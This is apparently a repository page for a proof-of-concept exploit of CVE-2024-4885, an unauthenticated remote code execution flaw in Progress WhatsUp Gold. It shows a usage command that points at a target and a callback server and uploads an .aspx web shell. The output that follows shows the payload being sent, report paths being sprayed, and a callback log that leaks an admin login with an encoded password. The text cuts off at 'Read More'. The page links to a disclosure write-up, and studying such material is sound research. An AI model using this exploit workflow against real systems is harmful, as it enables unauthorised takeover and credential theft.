CVE-2024-4885 PoC for CVE-2024-4885 Progress WhatsUp Gold GetFileWithoutZip Unauthenticated Remote Code Execution (CVE-2024-4885) Technical Analysis A root cause analysis of the vulnerability can be found on my blog: https://summoning.team/blog/progress-whatsup-gold-rce-cve-2024-4885/ Usage “` python3 CVE-2024-4885.py -t https://192.168.0.231:9642 -s 192.168.0.181:1337 -f hax.aspx _ _ _ _ _ _ __ _ __ _ _ _ _ _ | | | | | | | | | | | | | | | | | _ | |__ || | | | | || | | | | | | |_____| | _| |__ | _| |_| . | |____ | | | | | (*) Progress WhatsUp Gold GetFileWithoutZip Unauthenticated Remote Code Execution (CVE-2024-4885) (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam) (*) Technical details: https://summoning.team/blog/progress-whatsup-gold-rce-cve-2024-4885/ (^^) Prepare for the Pwnage (^^) (+) Sending payload to https://192.168.0.231:9642/NmConsole/ReportService.asmx () Callback server listening on https://192.168.0.181:1337 (+) Payload sent successfully () Checking if target is using HTTPS or HTTP https://192.168.0.231/NmConsole/ () Target host: https://192.168.0.231 () spraying… https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-24.aspx (+) Callback received 192.168.0.231 – – [06/Jul/2024 23:31:30] "GET /Session/Login/?sUsername=admin&sPassword=3,0,0,0,16,0,0,0 HTTP/1.1" 200 – 192.168.0.231 – – [06/Jul/2024 23:31:30] "PUT…Read More